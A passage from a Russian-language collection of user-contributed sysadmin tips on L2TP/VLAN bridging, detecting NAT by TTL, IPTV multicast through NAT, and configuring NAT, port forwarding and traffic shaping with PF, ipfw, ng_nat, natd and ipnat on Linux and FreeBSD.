echo request, id 26927, seq 1376, length 64 16:44:30.055116 76:a9:12:12:c7:30 > b2:19:70:63:90:85, ethertype IPv4 (0x0800), length 98: 192.168.30.1 > 192.168.30.2: ICMP echo reply, id 26927, seq 1376, length 64 16:44:30.990689 b2:19:70:63:90:85 > 76:a9:12:12:c7:30, ethertype 802.1Q (0x8100), length 102: vlan 6, p 0, ethertype IPv4, 10.1.6.2 > 10.1.6.1: ICMP echo request, id 27037, seq 2, length 64 16:44:30.990734 76:a9:12:12:c7:30 > b2:19:70:63:90:85, ethertype 802.1Q (0x8100), length 102: vlan 6, p 0, ethertype IPv4, 10.1.6.1 > 10.1.6.2: ICMP echo reply, id 27037, seq 2, length 64 l2tpeth можно объединить бриджом с физическим интерфейсом. выглядит это примерно так: root@atomus:~# ip a s l2tpeth0 7: l2tpeth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master vl0 state UNKNOWN qlen 1000 link/ether 1e:7f:ec:bd:cf:6a brd ff:ff:ff:ff:ff:ff root@atomus:~# ip a s vl0 9: vl0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP link/ether 1e:7f:ec:bd:cf:6a brd ff:ff:ff:ff:ff:ff inet 10.1.1.10/24 brd 10.1.1.255 scope global vl0 root@atomus:~# ip a s vlan5 11: vlan5@vl0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP link/ether 1e:7f:ec:bd:cf:6a brd ff:ff:ff:ff:ff:ff inet 10.1.5.10/24 brd 10.1.5.255 scope global vlan5 root@atomus:~# ip a s vlan222 12: vlan222@vl0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP link/ether 1e:7f:ec:bd:cf:6a brd ff:ff:ff:ff:ff:ff inet 10.1.222.10/24 brd 10.1.222.255 scope global vlan222 root@atomus:~# brctl show bridge name bridge id STP enabled interfaces vl0 8000.1e7fecbdcf6a no l2tpeth0 root@gw:~# ip a s vlan222 68: vlan222@l2tpeth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1488 qdisc noqueue state UP link/ether c6:8c:43:30:88:03 brd ff:ff:ff:ff:ff:ff inet 10.1.222.1/24 brd 10.1.222.255 scope global vlan222 root@gw:~# ip a s l2tpeth0 64: l2tpeth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000 link/ether c6:8c:43:30:88:03 brd ff:ff:ff:ff:ff:ff inet 10.1.1.1/24 brd 10.1.1.255 scope global l2tpeth0 root@atomus:~# ping 10.1.5.1 PING 10.1.5.1 (10.1.5.1) 56(84) bytes of data. 64 bytes from 10.1.5.1: icmp_req=1 ttl=64 time=6.37 ms 64 bytes from 10.1.5.1: icmp_req=2 ttl=64 time=5.53 ms ...... root@atomus:~# ping 10.1.222.1 PING 10.1.222.1 (10.1.222.1) 56(84) bytes of data. 64 bytes from 10.1.222.1: icmp_req=1 ttl=64 time=10.0 ms 64 bytes from 10.1.222.1: icmp_req=2 ttl=64 time=4.24 ms ..... Как видим, к нам приходит тегированный трафик: root@gw:~# tcpdump -n -e -i l2tpeth0 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on l2tpeth0, link-type EN10MB (Ethernet), capture size 65535 bytes 19:21:33.962979 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype 802.1Q (0x8100), length 102: vlan 5, p 0, ethertype IPv4, 10.1.5.10 > 10.1.5.1: ICMP echo request, id 3765, seq 139, length 64 19:21:33.963047 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype 802.1Q (0x8100), length 102: vlan 5, p 0, ethertype IPv4, 10.1.5.1 > 10.1.5.10: ICMP echo reply, id 3765, seq 139, length 64 19:21:33.986660 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype 802.1Q (0x8100), length 102: vlan 222, p 0, ethertype IPv4, 10.1.222.10 > 10.1.222.1: ICMP echo request, id 3764, seq 149, length 64 19:21:33.986698 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype 802.1Q (0x8100), length 102: vlan 222, p 0, ethertype IPv4, 10.1.222.1 > 10.1.222.10: ICMP echo reply, id 3764, seq 149, length 64 19:21:35.165848 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype 802.1Q (0x8100), length 102: vlan 5, p 0, ethertype IPv4, 10.1.5.10 > 10.1.5.1: ICMP echo request, id 3765, seq 140, length 64 19:21:35.165903 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype 802.1Q (0x8100), length 102: vlan 5, p 0, ethertype IPv4, 10.1.5.1 > 10.1.5.10: ICMP echo reply, id 3765, seq 140, length 64 19:21:35.168489 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype 802.1Q (0x8100), length 102: vlan 222, p 0, ethertype IPv4, 10.1.222.10 > 10.1.222.1: ICMP echo request, id 3764, seq 150, length 64 ... а тут уже тегов нет: root@gw:~# tcpdump -n -e -i vlan5 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on vlan5, link-type EN10MB (Ethernet), capture size 65535 bytes 19:22:17.038686 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype IPv4 (0x0800), length 98: 10.1.5.10 > 10.1.5.1: ICMP echo request, id 3765, seq 182, length 64 19:22:17.038759 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype IPv4 (0x0800), length 98: 10.1.5.1 > 10.1.5.10: ICMP echo reply, id 3765, seq 182, length 64 19:22:18.041890 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype IPv4 (0x0800), length 98: 10.1.5.10 > 10.1.5.1: ICMP echo request, id 3765, seq 183, length 64 19:22:18.041935 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype IPv4 (0x0800), length 98: 10.1.5.1 > 10.1.5.10: ICMP echo reply, id 3765, seq 183, length 64 root@gw:~# tcpdump -n -e -i vlan222 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on vlan222, link-type EN10MB (Ethernet), capture size 65535 bytes 19:23:14.155061 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype IPv4 (0x0800), length 98: 10.1.222.10 > 10.1.222.1: ICMP echo request, id 3764, seq 249, length 64 19:23:14.155100 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype IPv4 (0x0800), length 98: 10.1.222.1 > 10.1.222.10: ICMP echo reply, id 3764, seq 249, length 64 19:23:15.150799 1e:7f:ec:bd:cf:6a > c6:8c:43:30:88:03, ethertype IPv4 (0x0800), length 98: 10.1.222.10 > 10.1.222.1: ICMP echo request, id 3764, seq 250, length 64 19:23:15.150833 c6:8c:43:30:88:03 > 1e:7f:ec:bd:cf:6a, ethertype IPv4 (0x0800), length 98: 10.1.222.1 > 10.1.222.10: ICMP echo reply, id 3764, seq 250, length 64 если требуется "протащить" несколько trunk-интерфейсов, то достаточно сказать: ip l2tp add session tunnel_id 1 session_id 2 peer_session_id 2 В рамках одно туннеля может быть 65535 сессий.

Выявление NAT-устройства в сети Автор: Kirill [комментарии]

Значения TTL в популярных ОС известны (http://www.binbert.com/blog/2009/12/default-time-to-live-ttl-values/), например, в Linux 2.6.x и FreeBSD - 64, в Windows - 128. Если в сети имеется маршрутизатор на базе *nix или если есть возможность завернуть трафик на определенный хост, или настроен PBR на прозрачный прокси - на этой машине нужно выполнить: # tcpdump -vv -n -i @interface@ 'ip[7:2] != 128 and ip[7:2] != 64' Соответственно, если пакеты приходят с вашего маршрутизатора после PBR, значение TTL нужно уменьшить на 1. Но эта информация неточная, так как TLL в ОС можно поменять. Также полезным дополнением внутри этой команды будет 'src net @ваша внутренняя сеть@' и 'src net not @сеть, которую нужно исключить@'.

Организация доступа к IPTV через NAT (доп. ссылка 1) Автор: Антон Каукин [комментарии]

Инструкция для желающих настроить Multicast Routing на Linux шлюзе, обеспечивающем работу клиентов через NAT. Для переброса IGMP-трафика между подсетями будем использовать демон igmpproxy (http://sourceforge.net/projects/igmpproxy) Ставим IGMP Proxy из пакетов используемого дистрибутива или устанавливаем из исходных текстов: # tar -zxf igmpproxy-src-0.1.tar.gz # cd igmpproxy/ # less README # cd src/ # make && make install Правим файл конфигурации /etc/igmpproxy.conf. В представленном примере, интерфейс eth0 смотрит в публичную сеть провайдера Mig Telecom, а eth1 в домашнюю сеть. # Enable Quickleave mode (Sends Leave instantly) # Эту строчку раскомментируют только в том случае, # если внути всего лишь один клиент IP TV #quickleave # Configuration for eth0 (Upstream Interface) # Здесь указаны параметры для публичного интерфейса, # на который придет поток от провайдера phyint eth0 upstream ratelimit 0 threshold 1 altnet 10.20.0.0/16 altnet 88.210.40.0/24 altnet 80.240.211.0/22 # Configuration for eth1 (Downstream Interface) # Типовая конфигурация для внутреннего интерфейса phyint eth1 downstream ratelimit 0 threshold 1 # Configuration for eth2 (Disabled Interface) # eth2 в системе есть, но не используется никем, отключаем phyint eth2 disabled Запускаем igmpproxy и переходим к небольшой конфигурации IPTables. Вот этот набор правил понадобился для корректной работы пакетного фильтра, разрешается весь входящий мультикст, разрешается его форвардинг и плюс ко всему добавляем в TTL 1, без этого добавления не работает если пакеты от провайдера приходят с минимально выставленным TTL. modprobe ipt_TTL iptables -t filter -A INPUT -d 224.0.0.0/240.0.0.0 -i eth0 -j ACCEPT iptables -t filter -A INPUT -s 224.0.0.0/240.0.0.0 -i eth0 -j ACCEPT iptables -t filter -A FORWARD -d 224.0.0.0/240.0.0.0 -j ACCEPT iptables -t filter -A FORWARD -s 224.0.0.0/240.0.0.0 -j ACCEPT iptables -t mangle -A PREROUTING -d 224.0.0.0/240.0.0.0 -p udp -j TTL --ttl-inc 1

Настройка пакетного фильтра PF для проброса SIP-телефонов через NAT (доп. ссылка 1) (доп. ссылка 2) Автор: argo [комментарии]

Во FreeBSD для включения PF указываем в /etc/rc.conf: pf_enable="YES" При необходимости выделения гарантированной полосы пропускания для голосового трафика задействуем ALTQ. Пересобираем ядро с поддержкой ALTQ, указав в конфигурации: options ALTQ options ALTQ_CBQ # Class Bases Queuing (CBQ) options ALTQ_RED # Random Early Detection (RED) options ALTQ_RIO # RED In/Out options ALTQ_HFSC # Hierarchical Packet Scheduler (HFSC) options ALTQ_PRIQ # Priority Queuing (PRIQ) options ALTQ_NOPCC # Required for SMP build Далее для организации NAT для машин с SIP телефонами используем следующие настройки пакетного фильтра (/etc/pf.conf): # Вернет ошибку, порт заблокирован set block-policy return # тайм-аут UDP сессии должен быть равен или больше, чем время регистрации SIP # Таймер тайм-аута. Обычно достаточно 300 секунд. set timeout { udp.first 300, udp.single 150, udp.multiple 900 } # переменные int_if = "fxp0" ext_if = "fxp1" int_net = "192.168.1.0/24" ipphone1 = "192.168.1.18" ipphone2 = "192.168.1.19" # Включим очереди для внешнего интерфейса. Отделим голосовой трафик от данных altq on $ext_if hfsc bandwidth 512Kb queue { q_voice, q_other } queue q_voice bandwidth 3.84Kb priority 6 hfsc(realtime 96Kb) queue q_other bandwidth 416Kb hfsc { q_pri, q_std, q_low } queue q_pri bandwidth 200Kb priority 3 hfsc(red realtime 64Kb) queue q_std bandwidth 200Kb priority 2 hfsc(default red ) queue q_low bandwidth 3.84Kb priority 1 hfsc(red ) # Для каждого IP- телефона свое правило трансляции nat. # Параметр static-port нужен для сохранения временного порта UDP. # Это нужно чтобы удаленный SIP прокси знал к какой сессии привязан наш IP телефон. nat on $ext_if proto udp from $ipphone1 to any -> ($ext_if) static-port nat on $ext_if proto udp from $ipphone2 to any -> ($ext_if) static-port # Правило NAT для остальных устройств локальной сети nat on $ext_if from $int_net to any -> ($ext_if) pass in quick on lo0 all pass out quick on lo0 all # Разрешаем SIP трафик с телефонов на локальном интерфейсе pass in quick on $int_if proto udp from $ipphone1 to any tag VOIP keep state pass in quick on $int_if proto udp from $ipphone2 to any tag VOIP keep state pass in quick on $ext_if proto tcp from any to any port 22 keep state \ queue(q_std,q_pri) pass in quick on $ext_if proto tcp from any to any port 80 keep state \ queue q_low pass out quick on $ext_if tagged VOIP queue q_voice keep state pass out quick on $ext_if proto tcp from any to any port 22 keep state \ queue(q_std,q_pri) pass out quick on $ext_if proto tcp from any to any flags S/SA keep state \ queue(q_std,q_pri) pass out quick on $ext_if proto udp from any to any port 53 queue q_pri \ keep state # Разрешаем с внешнего интерфейса наружу tcp, udp, icmp pass out quick on $ext_if proto { tcp, udp, icmp } all keep state block in log all Конфигурация была протестирована на VoIP телефоне Cisco 7960, NAT прокси и outbound_proxy не используются, в телефоне настроен прокси-сервер SIP и порт контроля 5060/udp. Функция STUN в телефоне включена, хотя некоторые коммерческие SIP-прокси могут работать без него. Проверить очереди: pfctl -vsq -v Очистить таблицы состояний: pfctl -F state Проверка правил: pfctl -s rules -v

Трансляция адресов во FreeBSD средствами ng_nat (доп. ссылка 1) Автор: Folio [комментарии]

Для работы этого примера необходимо иметь подгруженный ng_ipfw.ko Убедиться в его наличии можно командой: /sbin/kldstat| grep ng_ipfw.ko Если ng_ipfw.ko не загружен, то загружаем его: /sbin/kldload /boot/kernel/ng_ipfw.ko После того как ng_ipfw.ko подгружен, в выводе команды: /usr/sbin/ngctl list появится строчка вида: Name: ipfw Type: ipfw ID: 00000023 Num hooks: 2 Без загруженного ng_ipfw.ko при попытке выполнить команды ngctl'а вы будете получать сообщение: ngctl: send msg: No such file or directory а при попытке добавить правило в ipfw получите: ipfw: getsockopt(IP_FW_ADD): Invalid argument Настройка ng_nat проста и сводится к скрипту: Для примера будем NAT'ить подсеть 172.16.5.96/27 через IP-адрес 192.168.20.8 на внешнем интерфейсе fxp0. #!/usr/bin/perl $ip='192.168.20.8'; $iface='fxp0'; $net='172.16.5.96/27'; $cmd=sprintf("/usr/sbin/ngctl -f - << -EOF mkpeer ipfw: nat 60 out name ipfw:60 nat connect ipfw: nat: 61 in msg nat: setaliasaddr %s ",$ip); system($cmd); ###добавляем необходимые правила в firewall $cmd=sprintf("/sbin/ipfw add 1000 netgraph 61 all from any to %s via %s in",$ip,$iface); system($cmd); $cmd=sprintf("/sbin/ipfw add 1010 netgraph 60 all from %s to any via %s out",$net,$iface); system($cmd); где: $ip - IP адрес, через который будет работать нат (который смотрит в интернет) $iface - ваш внешний интерфейс $net - IP подсеть, которую мы собираемся NAT'ить netgraph - правило в firewall, аналогично divert, только перенаправляет трафик не в socket, а в ноду netgraph, 60, 61 - адреса исходящего и входящего хуков. Если делать руками в консоли, то команды выглядят следующим образом: ###создаем ноду nat и подключаем к ipfw /usr/sbin/ngctl mkpeer ipfw: nat 60 out ###даем ноде имя "natA" /usr/sbin/ngctl name ipfw:60 natA ###соединяем входящие и исходящие хуки для "natA" /usr/sbin/ngctl connect ipfw: natA: 61 in ###посылаем управляющее сообщение в виде IP адреса, через который будет работать нат. /usr/sbin/ngctl msg natA: setaliasaddr 192.168.20.8 Если все работает, то мы можем посмотреть вывод следующей команды: ngctl show natA: Также можно посмотреть все целиком: ngctl list Для выключения настроенного NAT нужно выполнить команду: ngctl shutdown natA: Заметка: Если вы хотите запустить NAT на нескольких внешних IP-адресах, но не забывайте изменять имена нод (в примере natA) и номера хуков (в примере 60,61) т.к. они должны быть уникальны для каждого из процессов. Не путайте in и out в создаваемой ноде и правилах ipfw. Чтиво: man 8 ipfw Все о Netgraph (http://citrin.ru/netgraph/) man 4 netgraph man 4 ng_ipfw

Port mapping и открытие портов наружу во FreeBSD 7.1 (ipfw + kernel nat) Автор: reZon [комментарии]

Для начала надо пересобрать ядро со следующими опциями options IPFIREWALL #firewall options IPFIREWALL_VERBOSE #enable logging to syslogd(8) options IPFIREWALL_DEFAULT_TO_ACCEPT #allow everything by default options IPDIVERT options IPFIREWALL_FORWARD options DUMMYNET options IPFIREWALL_NAT #ipfw kernel nat support options LIBALIAS Далее пересобираем ядро: cd /usr/src/ make buildkernel KERNCONF=Yourkernel && make installkernel KERNCONF=Yourkernel shutdown -r now Далее кусок файла конфигурации с примером. 192.168.1.132 - ip адрес сетевой карты смотрящей наружу останое внутренние адреса #!/bin/sh # здесь просто удаляю старые правила ipfw -f flush ipfw nat 122 delete # разрещаю все через loopback ipfw add allow all from any to any via lo0 # делаю нат на ip смотрящем наружу, same_ports - для попытки сохранить номера портов при нате ipfw nat 123 config ip 192.168.1.132 log same_ports \ # пробрасываю все что приходит на порт 9999 на тот же порт внутренней машины # как вариант можно указать -redirect_port tcp 192.168.4.86:9999 192.168.1.132:9999 redirect_port tcp 192.168.4.86:9999 9999 # этот кусок нужен что бы у машины был не полный нат а только порт который я разрешил, # потому что вообще в интернет буду пускать через проксю. ipfw add 100 nat 123 tcp from 192.168.4.86 9999 to any ipfw add 100 nat 123 tcp from any to 192.168.4.86 9999 # здесь я разрешаю клиенту с ip 192.168.4.86 коннектится к любым серверам по 25 порту, # но только по нему. ipfw add 100 nat 123 tcp from 192.168.4.86 to any 25 # это что бы был нат, иначе ничего не будет работать, правило для выпуска клиентов наружу ipfw add 100 nat 123 ip from any to 192.168.1.132 Основанно на https://www.opennet.ru/tips/info/1618.shtml

Интернет-шлюз с использованием PF Автор: vitalic [комментарии]

O пакетном фильтре (PF) написано довольно много статей. Вот и я хочу предложить свою реализацию Интернет-шлюза с использованием PF. Раздача Интернета для локальной сети происходит через NAT и основана на Packet Tagging. Плюсом этого метода является то что упрощается настройка правил для FTP (ftp-proxy не используется), как для клиентов за шлюзом, так и для возможной публикации "внутреннего" ftp-сервера в мир. Для простоты приведу пример с 1 внешним и 1 внутренним интерфейсом. На шлюзе также запущен DNS-сервер. Пользователям локальной сети разрешен доступ на все порты без исключений по протоколам TCP, UDP, из ICMP разрешен только ping. В качестве ОС выступает FreeBSD7.0 Для начала определим интерфейсы с помощью макросов ext_if="rl0" int_if="sk1" dns="ААА.ААА.ААА.ААА" lan="192.168.1.0/24" table <no_if> {BBB.BBB.BBB.BBB, 192.168.1.1, 127.0.0.1} persist set skip on lo set loginterface rl0 set ruleset-optimization basic set block-policy return scrub in all no-df random-id ##### INET FOR LAN nat on $ext_if tag LAN_INET_NAT_TCP_UDP tagged LAN_INET_TCP_UDP -> $ext_if:0 nat on $ext_if tag LAN_INET_NAT_ICMP tagged LAN_INET_ICMP -> $ext_if:0 ###### block in block out antispoof quick for { lo $int_if } ############## EXT_IF_OUT pass out quick on $ext_if inet tagged LAN_INET_NAT_TCP_UDP pass out quick on $ext_if inet tagged LAN_INET_NAT_ICMP pass out quick on $ext_if inet proto {tcp udp} from $ext_if to $dns port = dns pass out quick on $ext_if inet proto icmp from $ext_if to any icmp-type echoreq ############## EXT_IF_IN pass in quick on $ext_if inet proto tcp from any to $ext_if port = ssh synproxy state (max 10) pass in quick on $ext_if inet proto icmp from any to $ext_if icmp-type echoreq ############## INT_IF_IN pass in quick on $int_if inet proto {tcp udp} from $lan to !<no_if> tag LAN_INET_TCP_UDP pass in quick on $int_if inet from $lan to $int_if pass in quick on $int_if inet proto icmp from $lan to !<no_if> icmp-type echoreq tag LAN_INET_ICMP pass in quick on $int_if inet proto icmp from $lan to $int_if icmp-type echoreq Пояснения. Пришедшие на внутр. интерфейс пакеты "метятся". Метятся только те пакеты, у которых dst addr любой, кроме всех внутренних и внешних интерфейсов. Это необходимо, если есть несколько подсетей и вы не хотите, что бы кто-либо из одной сети мог подключится к висящему сервису на другом интерфейсе. Впринципе здесь можно вместо !<no_if> указать any. Весь исходящий трафик с сервера в "мир" (кроме ДНС) и локальную сеть блокируется. ААА.ААА.ААА.ААА - IP DNS-сервера провайдера.

ipfw nat во FreeBSD 7 Автор: Pikador [комментарии]

В конфигурацию ядра добавляем: options IPFIREWALL #firewall options IPFIREWALL_VERBOSE #enable logging to syslogd(8) options IPFIREWALL_DEFAULT_TO_ACCEPT #allow everything by default options IPDIVERT options IPFIREWALL_FORWARD options DUMMYNET options IPFIREWALL_NAT #ipfw kernel nat support options LIBALIAS в /etc/make.conf: CFLAGS+= -DIPFIREWALL_NAT Далее пересобираем систему: cd /usr/src/ ; make builworld && make kernel KERNCONF=YourKern && make installworld reboot В конфигурационном файле ipfw: NatIP="111.111.111.111" ipfw nat 123 config ip ${NatIP} log ipfw add 10 nat 123 ip from 192.168.0.0/16 to any ipfw add 20 nat 123 ip from any to ${NatIP} Наслаждаемся достоинствами kernel nat

Настройка работы ipnat под большой нагрузкой (доп. ссылка 1) Автор: Антон Южанинов [комментарии]

Для работы ipnat под большой нагрузкой (много трансляций) нужно перед сборкой ядра изменить в файле /usr/src/sys/contrib/ipfilter/netinet/ip_nat.h #undefine LARGE_NAT на #define LARGE_NAT

Балансировка двух каналов средствами ipfw под FreeBSD Автор: Ivan Voytas [комментарии]

natd -p 8668 -a ip1 natd -p 8669 -a ip2 ipfw add divert 8668 ip from any to ip1 recv if1 ipfw add divert 8669 ip from any to ip2 recv if2 ipfw add check-state ipfw add prob 0.5 divert 8668 ip from 192.168.0.0/16 to any xmit if1 keep-state ipfw add divert 8669 ip from 192.168.0.0/16 to any xmit if1 keep-state ipfw add fwd gw1 ip from ip1 to any out xmit if1 (если default на if1) ipfw add fwd gw2 ip from ip2 to any out xmit if1

В двух словах про включение NAT и Firewall в ОС FreeBSD (доп. ссылка 1) Автор: hub.ru [комментарии]

Что бы поднять NAT и Firewall на FreeBSD надо: Скомпилировать ядро: Следующие строки нужно включить в /usr/src/sys/i386/conf/GENERIC файл конфигурации: options IPFIREWALL options IPDIVERT options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=10 options DUMMYNET options TCP_DROP_SYNFIN Переходим в директорию /usr/src/ make buildkernel KERNCONF=GENERIC make installkernel KERNCONF=GENERIC Следующие строки можно к примеру включить в rc.conf файл конфигурации: hostname="free" ifconfig_rl0="10.0.0.1" gateway_enable="YES" firewall_enable="YES" firewall_type="open" natd_enable="YES" natd_interface="rl0" natd_flags="-redirect_port tcp 10.0.0.10:80 80" tcp_extensions="NO" tcp_drop_synfin="YES" icmp_drop_redirect="YES" sendmail_enable="NONE" Для удаленного управления нужно добавить следующую строку: sshd_enable="YES" (возможно понадобится скопировать /etc/ssh/ssh_host_dsa_key.pub в /root/.ssh/authorized_keys Следующие строки можно включить в rc.firewall файл конфигурации (секция "open"): [Oo][Pp][Ee][Nn]) oif="rl0" iif="tx0" oip="132.5.7.172" iip="10.0.0.1" lan="10.0.0.0/24" setup_loopback # allow all for LAN ${fwcmd} add 500 pass all from ${lan} to ${iip} via ${iif} ${fwcmd} add 550 pass all from ${iip} to ${lan} via ${iif} # download - 60K upload - 6K for all lan ip's ${fwcmd} add 600 pipe 1 ip from any to any in via ${oif} ${fwcmd} add 650 pipe 2 ip from any to any out via ${oif} # for selected ip's only # ${fwcmd} add 601 pipe 1 all from any to 10.0.0.10 # ${fwcmd} add 651 pipe 2 all from 10.0.0.10 to any ${fwcmd} pipe 1 config bw 512Kbit/s ${fwcmd} pipe 2 config bw 48Kbit/s # dns setup ${fwcmd} add 770 pass tcp from any to ${oip} 53 setup ${fwcmd} add 780 pass udp from any domain to any ${fwcmd} add 790 pass udp from any to any domain # main setup ${fwcmd} add 800 pass tcp from any http,https,20-21,989-990 to any ${fwcmd} add 810 pass tcp from any to any http,https,20-21,989-990 ${fwcmd} add 830 pass tcp from any pop3,pop3s,smtp,imap,imaps,aol to any ${fwcmd} add 840 pass tcp from any to any pop3,pop3s,smtp,imap,imaps,aol ${fwcmd} add 65000 deny ip from any to any ;; Где oip, oif - внешний интерфейс; iip, iif - внутренний; lan - внутренняя сеть. Такая конфигурация ipfw весьма параноидальна, и здесь приведена только в качестве примера. На практике обычно нужен более открытый фаервол.

pf и трансляция адресов на двух интерфейсах Автор: DelGod [комментарии]

Решение оптимизировано для шлюза на флешке (не используется perl и другие "тяжелые" решения) ------------------------- /usr/local/etc/rc.d/openvpn.sh ------------------------- #!/bin/sh . /etc/rc.subr name=openvpn rcvar=`set_rcvar` prefix="/usr/local" openvpn_precmd() { for i in $openvpn_if ; do # FreeBSD <= 5.4 does not know kldstat's -m option # FreeBSD >= 6.0 does not add debug.* sysctl information # in the default build - we check both to keep things simple if ! sysctl debug.if_${i}_debug >/dev/null 2>&1 \ && ! kldstat -m if_${i} >/dev/null 2>&1 ; then if ! kldload if_${i} ; then warn "Could not load $i module." return 1 fi fi done return 0 } start_postcmd() { `/bin/cat /var/db/ukr_nets| /usr/bin/awk '{ if ($1) {system("route add "$1" 193.201.61.65 >/dev/null")} }'` /bin/sleep 10 && pfctl -F all -f /etc/pf.conf_openvpn } stop_postcmd() { `/bin/cat /var/db/ukr_nets| /usr/bin/awk '{ if ($1) {system("route delete "$1" 193.201.61.65 >/dev/null")} }'` pfctl -F all -f /etc/pf.conf rm -f "$pidfile" || warn "Could not remove $pidfile." } extra_commands="reload" pidfile="/var/run/${name}.pid" command="/usr/local/sbin/${name}" start_precmd="openvpn_precmd" start_postcmd="start_postcmd" stop_postcmd="stop_postcmd" load_rc_config ${name} : ${openvpn_enable="NO"} : ${openvpn_flags=""} : ${openvpn_if=""} : ${openvpn_configfile="${prefix}/etc/openvpn/openvpn.conf"} : ${openvpn_dir="${prefix}/etc/openvpn"} required_files="${openvpn_configfile}" command_args="--cd ${openvpn_dir} --daemon --config ${openvpn_configfile} --writepid ${pidfile}" run_rc_command "$1" ------------------------- /etc/pf.conf ------------------------- ext_if_t="rl0" int_if="rl1" table <users> persist { 192.168.1.0/24 } nat on $ext_if_t inet from <users> to any -> $ext_if_t pass on $ext_if_t all pass on $int_if all ------------------------- /etc/pf.conf_openvpn ------------------------- ext_if_o="tap0" ext_if_t="rl0" int_if="rl1" table <users> persist { 192.168.1.0/24 } table <ukr> persist file "/var/db/ukr_nets" nat on $ext_if_t inet from <users> to <ukr> -> $ext_if_t nat on $ext_if_o inet from <users> to !<ukr> -> $ext_if_o pass on $ext_if_o all pass on $ext_if_t all pass on $int_if all ------------------------- cron: ------------------------- 0 0 * * * /usr/bin/fetch -q -o "/var/db/ukr_nets" 'http://www.colocall.net/ua/?list'

Проброс портов с двух различных gateway на внутренний сервер через IPNAT Автор: Жека [комментарии]

Иногда необходимо пробросить порты с двух различных gateway GW1 и GW2 на один внутренний сервер, у которого в качестве default GW указан GW1. Прямой проброс и NAT невозможен, т.к. пакеты пришедшие из GW2 попытаются вернуться по маршруту через GW1. Есть следующий выход, это двойной NAT на GW2, при котором запрос приходит не снаружи, а с внутреннего IP. ed0 - внешний интерфейс lnc0 - интерфейс смотрящий внутрь. в ipnat.rules нужно прописать следующее: map ed0 10.6.10.0/24 -> 0.0.0.0/32 мапим локалку наружу map lnc0 0.0.0.0/0 -> 0.0.0.0/32 ремап внешних ip в локальные rdr ed0 0.0.0.0/0 port 80 -> 10.6.10.2 port 80 tcp форвард на внутренний сервер

Пример настройки NAT для двух сетей в FreeBSD 5.3 (доп. ссылка 1) Автор: Vov [комментарии]

Стоит задача - выпустить свою сеть в инет через два разных интерфейса rl1 и rl2. Так как адреса в локали серые, то надо поднимать NAT. С учетом того, что динамической маршрутизации не предвидится, будем поднимать NAT на 2 интерфейса. Для этого нужно: Скомпилировать ядро с параметрами: options IPFIREWALL options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=20 options IPFIREWALL_FORWARD options IPDIVERT options DUMMYNET options TCP_DROP_SYNFIN это необходимый минимум. На все случаи жизни ))))) Далее, в rc.local пишем такие строки: natd -p 8668 -n rl1 natd -p 8669 -n rl2 #natd -p 8671 -n rl3 #natd -p 8672 -n rl4 #natd -p 8673 -n rl5 Последние три строки - если кому надо поднимать NAT на большее количество интерфейсов. Следующее - правила ipfw: ipfw -f add divert 8668 all from #твоясеть# to any out via rl1 ipfw -f add divert 8668 all from any to #адрес_rl1# in via rl1 ipfw -f add divert 8669 all from #твоясеть# to any out via rl2 ipfw -f add divert 8669 all from any to #адрес_rl2# in via rl2 Теперь все, что будет выходить через внешние интерфейсы, будет правильно NATиться через них же. Остается проверить маршрутизацию. Если маска на rl2 /24. В этом случае все просто. Стандартный шлюз (default gateway) прописан через rl1, а все, что идет на сеть 999.888.0.0/24 будет автоматически бежать через rl2. Если же на rl2 выделена подсетка из нескольких адресов, то тогда надо писать жесткий марщрут на всю сеть 999.888.0.0/24 через rl2 на тот шлюз, который тебе дал провайдер N2. Его тоже можно прописать в rc.local отдельной строкой типа: route add 999.888.0.0/24 999.888.0.25 У Sergey2005 заработала комбинация: ${fwcmd} add 40 divert 8668 all from #моя сеть# to not #подсеть провайдера "S"# out via rl1 ${fwcmd} add 45 divert 8668 all from not #подсеть провайдера "S"# to any in via rl1 ${fwcmd} add 50 divert 8669 all from #моя сеть# to #подсеть провайдера "S"# out via rl2 ${fwcmd} add 55 divert 8669 all from #подсеть провайдера "S"# to any in via rl2 natd -p 8668 -m -u -n rl1 natd -p 8669 -m -u -n rl2

Особенности использование ftp из-за фаервола ipfw/natd Автор: globus [комментарии]

